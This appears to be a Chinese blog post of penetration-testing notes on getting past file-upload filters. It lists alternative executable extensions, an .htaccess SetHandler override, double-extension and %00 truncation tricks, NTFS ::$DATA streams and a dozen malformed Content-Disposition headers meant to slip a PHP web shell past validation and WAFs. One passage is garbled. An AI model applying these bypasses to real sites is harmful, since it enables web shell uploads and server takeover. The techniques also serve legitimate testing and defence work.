渗透思路笔记

最新推荐文章于 2024-07-04 10:05:57 发布
最新推荐文章于 2024-07-04 10:05:57 发布
阅读量2.7k 收藏
点赞数 1
分类专栏: 渗透 文章标签: 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MarkRao/article/details/121118849
版权

Bypass上传绕过

一般思路

01 前端代码js校验

一般情况下将一句话木马修改成png格式,在上传符合条件后进行抓包,修改成php或其他格式的木马文件。

02 MIME文件类型校验

当上传后,提示文件类型不正确,也有可能是MIME校验
将Content-Type:image/jpeg 或者Content-Type:image/png

03 php多种扩展名绕过

如果是黑名单限制,上传php文件时出现提示,php被加入了黑名单,可以尝试上传php5,php4等其他扩展名文件绕过黑名单限制

语言可解析后缀
phpphp ,php5, php4, php3, php2,pHp , pHp5 , pHp4 , pHp3, pHp2 , html, htm, phtml, pht , Html, Htm, pHtml
jspjsp , jspa, jspx, jsw,jsv, jspf, jtml, jSp, jSpx, jSpa, jSw, jSv, jSpf, jHtml
aspasp,aspx, asa, asax , ascx, ashx, asmx, cer,aSp,aSpx, aSa,aSax, aScx, aShx, aSmx, cEr

04 可上传.htaccess文件时结合图片马绕过

通过上传png图片发现文件名并未改变,但是各种扩展名大小写都被限制,尝试上传名为“.htaccess”文件,内容为:

SetHandler  application/x-httpd-php

上传成功后便会使得所有文件解析为php并且执行,此时上传文件改为png格式成功上传,查看解析

05 后缀名双写绕过或加上大小写进行双写绕过

通过上传hack.php文件后查看文件后缀.php被过滤,猜测可能之过滤一次,尝试双写后缀名绕过,这里双写要注意:hack.pphphp和hack.phphpp产生的文件是不同的,过滤的顺序是从左往右的,所以hack.phphpp会生成文件hack.hpp,所以为了避免这种情况出现需要插入完整的php,Php,PHP等后缀

06 %00截断绕过

通过测试得知是后端白名单限制,对内容并未过滤,可对上传文件名进行%00截断或对上传路径进行截断

另类思路

默认状态

Content-Disposition: form-data; name=“filepath”; filename=“f.php”
Content-Type: image/png

思路一:

Content-Disposition: form-data; name=“filepath”; filename="[0x09]f.php"
Content-Type: image/png

思路二:除去双引号的限制

Content-Disposition: form-data; name=“filepath”; filename=f.php
Content-Type: image/png

思路三: 再次添加一个filename1

Content-Disposition: form-data; name=“filepath”; filename=“f.php”;filename1=“test.png”
Content-Type: image/png

思路四: form中间+

Content-Disposition: f+orm-data; name=“filepath”;filename=“f.php”
Content-Type: image/png

思路五: 大小写

ConTent-Disposition: form-data; name=“filepath”; filename=“f.php”
Content-Type: image/png

思路六:去掉form-data

ConTent-Disposition: name=“filepath”; filename=“f.php”
Content-Type: image/png

思路七:可以在Content-Disposition:后添加多个空格或者tab,或者在form-data;后添加多个空格或者tab

ConTent-Disposition: form-data; name=“filepath”; filename=“f.php”
Content-Type: image/png

思路八: f.php . (空格+.)

ConTent-Disposition: form-data; name=“filepath”; filename=“f.php .”
Content-Type: image/png

思路九: 对引号"换行

ConTent-Disposition: form-data; name=“filepath”; filename="f.php
"
Content-Type: image/png

思路十: NTFS流
在php+Windows的情况下:文件名如果+":: D A T A " 会 把 " : : DATA" 会把 ":: DATA""::DATA"之后的数据当成文件流处理,并且不会检测后缀名且保持”::$DATA”之前的文件名

抓包修改1.php为如图所示
ConTent-Disposition: form-data; name=“filepath”; filename=“f.php::$DATA”
Content-Type: image/png

ConTent-Disposition: form-data; name=“filepath”; filename=“f.php::$DATA\0x00\fuck.asp0x00.jpg”
Content-Type: image/png

思路十一: 构造如请求[上传f.php成功]:

[mw_shl_code=bash,true]Content-Disposition: form-data; name=“FileUploadName”; filename=“f.php”

Content-Disposition: form-data; name=“FileUploadName”; filename=“test.txt”
Content-Type: application/octet-stream
Content-Disposition: form-data; name=“FileUploadName”; filename=“test.asp”
Content-Disposition: form-data;
name=“FileUploadName”; filename=“f.php”[/mw_shl_code]

思路十二: 构造Content-Type和ConTent-Disposition换位

Content-Type: image/png
ConTent-Disposition: form-data; name=“filepath”; filename=“f.php”
变成
Content-Disposition: form-data; name=“filepath”; filename=“f.php”
Content-Type: image/png

疯狂的1998
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
理解HTTP协议中的multipart/form-data
20年码农
12-29 9412
前提 之前在写一个通用HTTP组件的时候遇到过媒体(Media)类型multipart/form-data的封装问题,这篇文章主要简单介绍一下HTTP协议中媒体类型multipart/form-data的定义、应用和简单实现。 multipart/form-data的定义 媒体类型multipart/form-data遵循multipart MIME数据流定义(该定义可以参考Section 5.1 - RFC2046),大概含义就是:媒体类型multipart/form-data的数据体由多个部分组成
系统渗透笔记
05-09
系统渗透笔记渗透记录的笔记,有兴趣的可以下载看看,基础!
http header中的Content-disposition
刹那的博客
03-23 1万+
Access-Control-Expose-Headers 响应首部 Access-Control-Expose-Headers 列出了哪些首部可以作为响应的一部分暴露给外部。 默认情况下,只有六种 simple response headers (简单响应首部)可以暴露给外部: Cache-Control Content-Language Content-Type Expires Last-M...
Jmeter 请求 Content-Disposition: form-data; name="xxx",解决成功
Duyf的博客
05-06 1万+
1.Fiddler抓包获取的数据 ------WebKitFormBoundaryBmKXFeVlGqAdTxyH Content-Disposition: form-data; name="platformId" 0 ------WebKitFormBoundaryBmKXFeVlGqAdTxyH Content-Disposition: form-data; name="name" 上海xxx...
网络基础之Content-Disposition
2401_84002271的博客
05-04 1312
为什么我不完全主张自学?①平台上的大牛基本上都有很多年的工作经验了,你有没有想过之前行业的门槛是什么样的,现在行业门槛是什么样的?以前企业对于程序员能力要求没有这么高,甚至十多年前你只要会写个“Hello World”,你都可以入门这个行业,所以以前要入门是完全可以入门的。②现在也有一些优秀的年轻大牛,他们或许也是自学成才,但是他们一定是具备优秀的学习能力,优秀的自我管理能力(时间管理,静心坚持等方面)以及善于发现问题并总结问题。
ajax上传文件,文件开头出现Content-Disposition: form-data
qq_30285561的博客
06-25 4838
ajax上传文件,文件开头出现Content-Disposition: form-data; 使用触动精灵remote-api的上传文件接口 上传的js代码为: export default function upload (file) { let FromData = new FormData(); FromData.append("imgdata", file); let xhr = new XMLHttpRequest() //new一个XMLHttpRequest对象 xhr.o
http上传/下载文件时,Content-Disposition的使用
热门推荐
衍夏成歌的博客
04-27 7万+
Content-disposition是 MIME 协议的扩展,MIME 协议指示 MIME 用户代理如何显示附加的文件。当 Internet Explorer 接收到头时,它会激活文件下载对话框,它的文件名框自动填充了头中指定的文件名。(请注意,这是设计导致的;无法使用此功能将文档保存到用户的计算机上,而不向用户询问保存位置。) Rfc1867中可查 1.      上传文件请求头: Co
内网渗透思路整理与工具使用
12-08
内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用
网络安全之WAF攻防实战笔记
09-21
网络安全之WAF攻防实战笔记,行业大神学习总结。 这份文档分为技巧篇和实战篇,技巧篇介绍了各种服务器、数据库、应用层、WAF层的特性,在实战篇中,我们将灵活运用各种技巧去绕过WAF防护。有些姿势或许早已失效,但...
asp提权笔记大全,渗透中遇到的各种问题
12-26
笔记大全是XXX团队对渗透过程中遇到的各种ASP提权问题的总结,包含了独特的解决方案,这些内容在网络上可能难以找到。 提权思路通常是通过寻找系统漏洞、配置错误或设计缺陷来实现。在ASP环境中,以下是一些关键...
阿里首推springboot核心笔记,搭建Eureka注册中心(1)
m0_60452957的博客
08-06 146
#eureka server 配置 eureka: instance: hostname: localhost client: register-with-eureka: false #是否将自己注册到注册中心 fetch-registry: false #是否从eureka获取注册信息 service-url: #配置暴露给eureka client的请求地址defaultZone defaultZone: http://${eureka.instance.hostname
Content-Disposition响应头
金溪的博客
11-16 1387
下面的描述是语法树的形式: disposition := "Content-Disposition" ":" disposition-type *(";" disposition-parm) disposition-type := "inline" / "attachment" ...
文件上传绕过的一些姿势
weixin_37104668的博客
03-12 1295
WAF绕过 1.绕过思路:对文件的内容,数据。数据包进行处理。 关键点在这里Content-Disposition: form-data; name=“file”; filename=“ian.php” 将form-data; 修改为~form-data; 2.通过替换大小写来进行绕过 Content-Disposition: form-data; name=“file”; ...
谈谈form-data请求格式
weixin_30343157的博客
12-03 690
最近一直都比较忙,坚持月月更新博客的计划不得中止了,今天抽出点时间来说说最近项目中遇到的一个问题,有关request post请求格式中的multipart/form-data格式。 引言 最近在参与一个项目过程中遇到一个问题,相信大部分人都遇到过: 在后端与前端约定好application/json格式传递数据时,因为后台是go强类型语言,在定义api接口时,某些字段要求是整型类型,但是对于前...
java解析请求的字符串参数Content-Disposition: form-data;和&拼接的键值对
最新发布
涛哥是个大帅比
07-04 440
获取到http请求的参数,已经被字符串接收了,需求是需要从字符串中解析出来。一种情况是:另一种是:key1=value1&key2=value2&key3=value3,&拼接的键值对。
一文搞懂如何利用multipart/form-data实现文件的上传与下载
TonyBai
01-16 1万+
1. Form简介**Form**(中文译为表单)[1],是HTML标记语言中的重要语法元素。一个Form不仅包含正常的文本内容、标记等,还包含被称为控件的特殊元素。用户通常通过修改控件...
关于form-data和http请求body&网关处理
qq789aa134的博客
04-20 3220
如上面的格式,需要自行研究body的换行符号,我之前就是看着图上的格式进行\n换行,结果真实格式有一点点不一样,有点地方还要加斜杠。在网关过滤器中,监听所有http请求,截获请求,并且修改body中内容。使用form-data时,body采用下面的 'boundary—'限定边界,加入参数的形式进行传递。–form-data : key就是namae=“”的内容 ,value内容就是换行下面的那个参数。http–请求协议内容:form-data————表单提交,只携带参数的情况。
BackTrack渗透测试学习笔记概述
"这是一份关于BackTrack渗透测试的学习笔记,由作者IceSn0w编写,旨在分享其在BackTrack使用过程中的经验和技巧。笔记涵盖了Metasploit渗透测试指南、信息收集、身份识别、社会工程学攻击、Metasploit运用层攻击、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

疯狂的1998

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值